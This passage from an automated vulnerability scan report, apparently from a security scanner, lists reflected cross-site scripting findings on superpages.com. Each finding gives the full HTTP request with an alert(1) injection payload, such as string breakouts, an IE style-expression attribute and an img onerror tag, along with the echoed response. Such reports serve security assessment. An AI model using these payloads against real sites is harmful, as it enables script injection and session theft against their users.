var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

1.515. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f735"-alert(1)-"5e13c75896f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750717878-www.superpages.com-25570824-638833; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:57 GMT; Path=/
Set-Cookie: JSESSIONID=5C32A1099510A145A292891057754A90; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:57 GMT
Content-Length: 66498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
tp://yellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'ht
...[SNIP]...

1.516. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7a3"-alert(1)-"d9426b3b370 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750760787-www.superpages.com-11101702-780397; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:32:40 GMT; Path=/
Set-Cookie: JSESSIONID=82629E94B8FADDDBFF9B5C6A1B6BECC4; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:40 GMT
Content-Length: 18489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
gescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.517. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the SRC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02 was submitted in the SRC parameter. This input was echoed as 8c3a4"style="x:expression(alert(1))"d28cbb2cb02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750439498-www.superpages.com-4789827-628076; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:19 GMT; Path=/
Set-Cookie: JSESSIONID=8C15D1E521D5C7BAD68D0A53F9577955; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:27:18 GMT
Content-Length: 128435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a href="http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toBusinesses&SRC=comlocal1a8c3a4"style="x:expression(alert(1))"d28cbb2cb02" rel="nofollow" onClick="clickTrackTabs('GT','MySuperpages', 'yp_profile');">
...[SNIP]...

1.518. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ebe9"%3balert(1)//fc3f4c0a516 was submitted in the SRC parameter. This input was echoed as 3ebe9";alert(1)//fc3f4c0a516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a3ebe9"%3balert(1)//fc3f4c0a516&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750452826-www.superpages.com-16809597-702534; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:32 GMT; Path=/
Set-Cookie: JSESSIONID=4CDE972A6F7062265EBD4234C3250381; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:27:33 GMT
Content-Length: 126537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
ww.superpages.com";
s.prop5 = "Advanced Search, Business Profile";
s.prop9 = "Advanced Search";
s.eVar23 = "Advanced Search";
s.hier1 = "Advanced Search, Business Profile";
var s_campaign = "comlocal1a3ebe9";alert(1)//fc3f4c0a516";
if(s_campaign){
s.campaign = s_campaign;
}
var s_code = s.t();
if(s_code)
document.writeln(s_code);
//-->
...[SNIP]...

1.519. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [TR parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the TR request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843a2"-alert(1)-"a8e7c8583e3 was submitted in the TR parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750623993-www.superpages.com-28426864-914831; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:23 GMT; Path=/
Set-Cookie: JSESSIONID=265FBF1301E359B78C423E3003AF80EE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:23 GMT
Connection: close
Content-Length: 23380


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
ype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.520. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [bidType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the bidType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5dd4"-alert(1)-"d9f9799ecf8 was submitted in the bidType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750603809-www.superpages.com-9081164-800011; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:03 GMT; Path=/
Set-Cookie: JSESSIONID=219F120FEB2F8290C38E110E827DE695; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:03 GMT
Content-Length: 66496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
archtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

1.521. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [lbp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the lbp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f71cf"-alert(1)-"8b1ed61181f was submitted in the lbp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750510916-www.superpages.com-5233303-969715; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:28:30 GMT; Path=/
Set-Cookie: JSESSIONID=742BF78E1A6BFC3ABF53A5C98640882B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:28:30 GMT
Content-Length: 60956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank - Handlin
...[SNIP]...
= 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

1.522. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7992e"-alert(1)-"47024e3844d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750649070-www.superpages.com-20879668-932317; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:49 GMT; Path=/
Set-Cookie: JSESSIONID=3B2D663DFEFD640AA8C05C35E7490265; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:48 GMT
Content-Length: 23390


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
pe="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.523. http://www.superpages.com/bp/xmlproxy [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/xmlproxy

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f53dc"-alert(1)-"b9a871a93d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_cc=true; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:03:55 GMT
Content-Length: 57628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.524. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /coupons

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b22"-alert(1)-"6172bed7d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons?f3b22"-alert(1)-"6172bed7d5b=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=14A03C36B158EBE2AE84FEB1EA46C2E7; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 74692
Date: Thu, 03 Feb 2011 17:09:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h
...[SNIP]...
//yellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/coupons?f3b22"-alert(1)-"6172bed7d5b=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.525. http://www.superpages.com/inc/social/sln.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/sln.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e04"-alert(1)-"5dda26f052b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomlocal1a%26lbp%3D1%26PGID%3Ddalms102.8089.1296748577335.307646855%26bidType%3DCLIK%26TR%3D1&s=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 404 /inc/social/54e04&quot;-alert(1)-&quot;5dda26f052b
Server: Unspecified
Set-Cookie: JSESSIONID=E867CF351209BE67050698C0585FCB01; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:06:55 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
var hostServ = 'http://www.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://www.superpages.com/inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomloc
...[SNIP]...

1.526. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 was submitted in the REST URL parameter 2. This input was echoed as 43ba5"><img src=a onerror=alert(1)>935e0c29137 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
